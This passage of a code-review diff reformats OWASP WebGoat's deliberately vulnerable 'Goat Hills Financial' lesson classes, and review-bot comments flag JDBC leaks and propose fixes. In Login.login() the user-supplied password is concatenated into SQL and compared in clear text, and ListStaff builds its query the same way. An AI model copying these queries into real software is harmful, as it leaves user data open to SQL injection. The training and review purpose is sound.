public final static String FINDPROFILE_ACTION = "FindProfile"; - public final static String VIEWPROFILE_ACTION = "ViewProfile"; + public final static String VIEWPROFILE_ACTION = "ViewProfile"; - public final static String EDITPROFILE_ACTION = "EditProfile"; + public final static String EDITPROFILE_ACTION = "EditProfile"; - public final static String UPDATEPROFILE_ACTION = "UpdateProfile"; + public final static String UPDATEPROFILE_ACTION = "UpdateProfile"; - public final static String CREATEPROFILE_ACTION = "CreateProfile"; + public final static String CREATEPROFILE_ACTION = "CreateProfile"; - public final static String DELETEPROFILE_ACTION = "DeleteProfile"; + public final static String DELETEPROFILE_ACTION = "DeleteProfile"; - public final static String ERROR_ACTION = "error"; + public final static String ERROR_ACTION = "error"; - private final static Integer DEFAULT_RANKING = new Integer(125); + private final static Integer DEFAULT_RANKING = new Integer(125); - private Map lessonFunctions = new Hashtable(); + private Map lessonFunctions = new Hashtable(); - public GoatHillsFinancial() - { - String myClassName = parseClassName(this.getClass().getName()); - registerActions(myClassName); - } - - protected void registerActions(String className) { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); - - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, - getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, - getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, - getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, - UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, - DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } - - protected final String parseClassName(String fqcn) - { - String className = fqcn; - - int lastDotIndex = fqcn.lastIndexOf('.'); - if (lastDotIndex > -1) - className = fqcn.substring(lastDotIndex + 1); - - return className; - } - - protected void registerAction(LessonAction action) - { - lessonFunctions.put(action.getActionName(), action); - } - - public String[] getStages() { - return new String[] {}; - } - - protected List getHints(WebSession s) - { - return new ArrayList(); - } - - public String getInstructions(WebSession s) - { - return ""; - } - - protected LessonAction getAction(String actionName) - { - return lessonFunctions.get(actionName); - } - - public void handleRequest(WebSession s) - { - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try + public GoatHillsFinancial() { - requestedActionName = s.getParser().getStringParameter("action"); - } - catch (ParameterNotFoundException pnfe) - { - // Let them eat login page. 
- requestedActionName = LOGIN_ACTION; + String myClassName = parseClassName(this.getClass().getName()); + registerActions(myClassName); } - try + protected void registerActions(String className) { - LessonAction action = getAction(requestedActionName); - if (action == null) - { + registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); + registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); + registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); + registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); + registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + + // These actions are special in that they chain to other actions. + registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); + registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); + registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); + } + + protected final String parseClassName(String fqcn) + { + String className = fqcn; + + int lastDotIndex = fqcn.lastIndexOf('.'); + if (lastDotIndex > -1) className = fqcn.substring(lastDotIndex + 1); + + return className; + } + + protected void registerAction(LessonAction action) + { + lessonFunctions.put(action.getActionName(), action); + } + + public String[] getStages() + { + return new String[] {}; + } + + protected List getHints(WebSession s) + { + return new ArrayList(); + } + + public String getInstructions(WebSession s) + { + return ""; + } + + protected LessonAction getAction(String actionName) + { + return lessonFunctions.get(actionName); + } + + public void handleRequest(WebSession s) + { + if (s.getLessonSession(this) == null) s.openLessonSession(this); + + String 
requestedActionName = null; + try + { + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. + requestedActionName = LOGIN_ACTION; + } + + try + { + LessonAction action = getAction(requestedActionName); + if (action == null) + { + setCurrentAction(s, ERROR_ACTION); + } + else + { + // System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " + + // action.getActionName()); + if (action.requiresAuthentication()) + { + if (action.isAuthenticated(s)) + { + action.handleRequest(s); + } + else + throw new UnauthenticatedException(); + } + else + { + // Access to Login does not require authentication. + action.handleRequest(s); + } + } + } catch (ParameterNotFoundException pnfe) + { + System.out.println("Missing parameter"); + pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); - } else - { - //System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " + action.getActionName()); - if (action.requiresAuthentication()) + } catch (ValidationException ve) { - if (action.isAuthenticated(s)) - { - action.handleRequest(s); - } - else - throw new UnauthenticatedException(); - } - else + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) { - // Access to Login does not require authentication. 
- action.handleRequest(s); + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + s.setMessage("You are not authorized to perform this function"); + System.out.println("Authorization failure"); + setCurrentAction(s, ERROR_ACTION); + ue2.printStackTrace(); + } catch (Exception e) + { + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); } - } + + // All this does for this lesson is ensure that a non-null content exists. + setContent(new ElementContainer()); } - catch (ParameterNotFoundException pnfe) + + public boolean isAuthorized(WebSession s, int userId, String functionId) { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); + // System.out.println("Checking authorization from " + getCurrentAction(s)); + LessonAction action = getAction(getCurrentAction(s)); + return action.isAuthorized(s, userId, functionId); } - catch (ValidationException ve) + + public int getUserId(WebSession s) throws ParameterNotFoundException { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); + LessonAction action = getAction(getCurrentAction(s)); + return action.getUserId(s); } - catch (UnauthenticatedException ue) + + public String getUserName(WebSession s) throws ParameterNotFoundException { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); + LessonAction action = getAction(getCurrentAction(s)); + return action.getUserName(s); } - catch (UnauthorizedException ue2) + + protected String getJspPath() { - s.setMessage("You are not authorized to perform this function"); - System.out.println("Authorization failure"); - setCurrentAction(s, ERROR_ACTION); - ue2.printStackTrace(); + return "/lessons/" + getLessonName() + "/"; } - 
catch (Exception e) + + public String getTemplatePage(WebSession s) { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); + return getJspPath() + getLessonName() + ".jsp"; } - // All this does for this lesson is ensure that a non-null content exists. - setContent(new ElementContainer()); - } + public String getPage(WebSession s) + { + String page = getJspPath() + getCurrentAction(s) + ".jsp"; - public boolean isAuthorized(WebSession s, int userId, String functionId) - { - //System.out.println("Checking authorization from " + getCurrentAction(s)); - LessonAction action = getAction(getCurrentAction(s)); - return action.isAuthorized(s, userId, functionId); - } + return page; + } - public int getUserId(WebSession s) throws ParameterNotFoundException - { - LessonAction action = getAction(getCurrentAction(s)); - return action.getUserId(s); - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - public String getUserName(WebSession s) throws ParameterNotFoundException - { - LessonAction action = getAction(getCurrentAction(s)); - return action.getUserName(s); - } + public String getTitle() + { + return "Goat Hills Financials"; + } - protected String getJspPath() { - return "/lessons/" + getLessonName() + "/"; - } - - public String getTemplatePage(WebSession s) - { - return getJspPath() + getLessonName() + ".jsp"; - } + public String getSourceFileName() + { + // FIXME: Need to generalize findSourceResource() and use it on the currently active + // LessonAction delegate to get its source file. 
+ // return findSourceResource(getCurrentLessonScreen()....); + return super.getSourceFileName(); + } - public String getPage(WebSession s) - { - String page = getJspPath() + getCurrentAction(s) + ".jsp"; - - return page; - } - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - public String getTitle() - { - return "Goat Hills Financials"; - } - - public String getSourceFileName() - { - // FIXME: Need to generalize findSourceResource() and use it on the currently active - // LessonAction delegate to get its source file. - //return findSourceResource(getCurrentLessonScreen()....); - return super.getSourceFileName(); - } - - @Override - protected boolean getDefaultHidden() { + @Override + protected boolean getDefaultHidden() + { return getClass().equals(GoatHillsFinancial.class); } public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + { + return super.getCustomCredits("", ASPECT_LOGO); + } @Override - protected String getLessonName() { + protected String getLessonName() + { String className = getClass().getName(); int index = className.lastIndexOf('.'); - if (index > -1) - return className.substring(index+1); + if (index > -1) return className.substring(index + 1); return super.getLessonName(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java index 8bcf4baa8..257abe1dd 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import org.owasp.webgoat.session.ParameterNotFoundException; 
@@ -6,22 +7,23 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; + public interface LessonAction { - public void handleRequest(WebSession s) - throws ParameterNotFoundException, UnauthenticatedException, UnauthorizedException, ValidationException; - + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException; + public String getNextPage(WebSession s); - + public String getActionName(); public boolean requiresAuthentication(); - + public boolean isAuthenticated(WebSession s); - + public boolean isAuthorized(WebSession s, int employeeId, String functionId); - + public int getUserId(WebSession s) throws ParameterNotFoundException; - + public String getUserName(WebSession s) throws ParameterNotFoundException; } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java index efee3ef10..7972b2700 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.sql.ResultSet; 
@@ -5,117 +6,107 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.List; import java.util.Vector; - import org.owasp.webgoat.session.EmployeeStub; import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ListStaff extends DefaultLessonAction { - public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName) - { - super(lesson, lessonName, actionName); - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + GoatHillsFinancial.USER_ID); - - List employees = getAllEmployees(s, userId); - setSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.LISTSTAFF_ACTION; - } - - public List getAllEmployees(WebSession s, int userId) - throws UnauthorizedException - { - // Query the database for all employees "owned" by the given employee - - List employees = new Vector(); - - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " - + "(SELECT employee_id FROM ownership WHERE employer_id = " - + userId + ")"; + getLesson().setCurrentAction(s, getActionName()); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) + if (isAuthenticated(s)) { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - //System.out.println("Retrieving employee stub for role " + role); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, - lastName, role); - employees.add(stub); + int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); + + List employees = getAllEmployees(s, userId); + setSessionAttribute(s, getLessonName() + "." 
+ GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees); } - } - catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); + else + throw new UnauthenticatedException(); } - return employees; - } + public String getNextPage(WebSession s) + { + return GoatHillsFinancial.LISTSTAFF_ACTION; + } + + public List getAllEmployees(WebSession s, int userId) throws UnauthorizedException + { + // Query the database for all employees "owned" by the given employee + + List employees = new Vector(); + + try + { + String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " + + "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")"; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + answer_results.beforeFirst(); + while (answer_results.next()) + { + int employeeId = answer_results.getInt("userid"); + String firstName = answer_results.getString("first_name"); + String lastName = answer_results.getString("last_name"); + String role = answer_results.getString("role"); + // System.out.println("Retrieving employee stub for role " + role); + EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); + employees.add(stub); + } + } catch (SQLException sqle) + { + s.setMessage("Error getting employees"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employees"); + e.printStackTrace(); + } + + return employees; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java index d2ef4508d..96834fb08 100755 
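Review bot: `getAllEmployees()` on the new side still never closes `answer_statement` or `answer_results`, so each staff listing leaks a JDBC statement and its cursor for as long as the connection lives; the same pattern appears in Login.java in both `login()` and `getAllEmployees()`. The file's Java level appears to predate try-with-resources, so a `finally` block that closes the statement (closing a `Statement` also closes its `ResultSet`) is the compatible fix, as below. The method also declares `throws UnauthorizedException` while nothing in its body can raise it; either drop it from the signature or add a comment explaining why the declaration is kept for the interface.
```java
            Statement answer_statement = null;
            try
            {
                answer_statement = WebSession.getConnection(s)
                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
                ResultSet answer_results = answer_statement.executeQuery(query);
                // … unchanged: cursor loop building the EmployeeStub list …
            } catch (SQLException sqle)
            {
                // … unchanged: setMessage and printStackTrace …
            } finally
            {
                if (answer_statement != null)
                {
                    try
                    {
                        answer_statement.close(); // also closes answer_results
                    } catch (SQLException ignored)
                    {
                        // nothing further to do if close itself fails
                    }
                }
            }
```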
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.sql.ResultSet; @@ -5,7 +6,6 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.List; import java.util.Vector; - import org.owasp.webgoat.session.EmployeeStub; import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.UnauthenticatedException; 
@@ -13,207 +13,179 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Login extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public Login(GoatHillsFinancial lesson, String lessonName, String actionName, - LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - ValidationException - { - //System.out.println("Login.handleRequest()"); - getLesson().setCurrentAction(s, getActionName()); - - List employees = getAllEmployees(s); - setSessionAttribute(s, getLessonName() + "." - + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees); - - int employeeId = -1; - try + public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - employeeId = s.getParser().getIntParameter( - GoatHillsFinancial.EMPLOYEE_ID); - String password = s.getParser().getStringParameter( - GoatHillsFinancial.PASSWORD); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - // Attempt authentication - if (login(s, employeeId, password)) - { - // Execute the chained Action if authentication succeeded. 
+ public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException + { + // System.out.println("Login.handleRequest()"); + getLesson().setCurrentAction(s, getActionName()); + + List employees = getAllEmployees(s); + setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees); + + int employeeId = -1; try { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) + employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); + String password = s.getParser().getStringParameter(GoatHillsFinancial.PASSWORD); + + // Attempt authentication + if (login(s, employeeId, password)) + { + // Execute the chained Action if authentication succeeded. + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + else + s.setMessage("Login failed"); + } catch (ParameterNotFoundException pnfe) { - System.out.println("Internal server error"); - ue1.printStackTrace(); + // No credentials offered, so we log them out + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE); } - catch (UnauthorizedException ue2) + } + + /** + * After this.handleRequest() is called, when the View asks for the current JSP to load, it will + * get one initialized by this call. 
+ */ + public String getNextPage(WebSession s) + { + String nextPage = GoatHillsFinancial.LOGIN_ACTION; + + if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s); + + return nextPage; + + } + + public boolean requiresAuthentication() + { + return false; + } + + public boolean login(WebSession s, int userId, String password) + { + // System.out.println("Logging in to lesson"); + boolean authenticated = false; + + try { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - else - s.setMessage("Login failed"); - } - catch (ParameterNotFoundException pnfe) - { - // No credentials offered, so we log them out - setSessionAttribute(s, getLessonName() + ".isAuthenticated", - Boolean.FALSE); - } - } + String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'"; + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.first()) + { + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE); + setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID, Integer.toString(userId)); + authenticated = true; + } - /** - * After this.handleRequest() is called, when the View asks for the current JSP to load, - * it will get one initialized by this call. 
- */ - public String getNextPage(WebSession s) - { - String nextPage = GoatHillsFinancial.LOGIN_ACTION; - - if (isAuthenticated(s)) - nextPage = chainedAction.getNextPage(s); - - return nextPage; - - } - - - public boolean requiresAuthentication() - { - return false; - } - - - public boolean login(WebSession s, int userId, String password) - { - //System.out.println("Logging in to lesson"); - boolean authenticated = false; - - try - { - String query = "SELECT * FROM employee WHERE userid = " + userId - + " and password = '" + password + "'"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.first()) + } catch (SQLException sqle) + { + s.setMessage("Error logging in"); + sqle.printStackTrace(); + } + } catch (Exception e) { - setSessionAttribute(s, - getLessonName() + ".isAuthenticated", Boolean.TRUE); - setSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.USER_ID, Integer - .toString(userId)); - authenticated = true; + s.setMessage("Error logging in"); + e.printStackTrace(); } - } - catch (SQLException sqle) - { - s.setMessage("Error logging in"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error logging in"); - e.printStackTrace(); + // System.out.println("Lesson login result: " + authenticated); + return authenticated; } - //System.out.println("Lesson login result: " + authenticated); - return authenticated; - } - - - public List getAllEmployees(WebSession s) - { - List employees = new Vector(); - - // Query the database for all roles the given employee belongs to - // Query the database for all employees "owned" by these roles - - try + public List getAllEmployees(WebSession s) { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles " - + "where employee.userid=roles.userid"; + List employees = new Vector(); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) + // Query the database for all roles the given employee belongs to + // Query the database for all employees "owned" by these roles + + try { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, - lastName, role); - employees.add(stub); - } - } - catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); - } + String query = "SELECT employee.userid,first_name,last_name,role FROM 
employee,roles " + + "where employee.userid=roles.userid"; - return employees; - } + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + answer_results.beforeFirst(); + while (answer_results.next()) + { + int employeeId = answer_results.getInt("userid"); + String firstName = answer_results.getString("first_name"); + String lastName = answer_results.getString("last_name"); + String role = answer_results.getString("role"); + EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); + employees.add(stub); + } + } catch (SQLException sqle) + { + s.setMessage("Error getting employees"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employees"); + e.printStackTrace(); + } + + return employees; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java index c02c3cef6..3e155d5fa 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import org.owasp.webgoat.session.ParameterNotFoundException; 
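Review bot: The reformatted `login()` still concatenates `password`, taken straight from the request parser in `handleRequest()`, into the SQL text, so the new side remains open to SQL injection exactly as the old side was. Unless this concatenation is a deliberate lesson target for a subclass, bind both values through a `PreparedStatement` as below, which needs `import java.sql.PreparedStatement;` alongside the existing `java.sql` imports. The query also compares the supplied password against the stored column verbatim; changing the storage format is outside this commit, but a `// NOTE: credentials are compared in clear text` comment next to the query would stop the next reader from assuming hashing happens elsewhere.
```java
            String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
            try
            {
                PreparedStatement answer_statement = WebSession.getConnection(s)
                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
                answer_statement.setInt(1, userId);
                answer_statement.setString(2, password);
                ResultSet answer_results = answer_statement.executeQuery();
                // … unchanged: first() check, session attributes, authenticated = true …
```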
@@ -6,79 +7,70 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Logout extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public Logout(GoatHillsFinancial lesson, String lessonName, String actionName, - LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - ValidationException - { - //System.out.println("Logging out"); - - setSessionAttribute(s, getLessonName() + ".isAuthenticated", - Boolean.FALSE); - - // FIXME: Maybe we should forward to Login. - try + public Logout(GoatHillsFinancial lesson, String lessonName, String actionName, 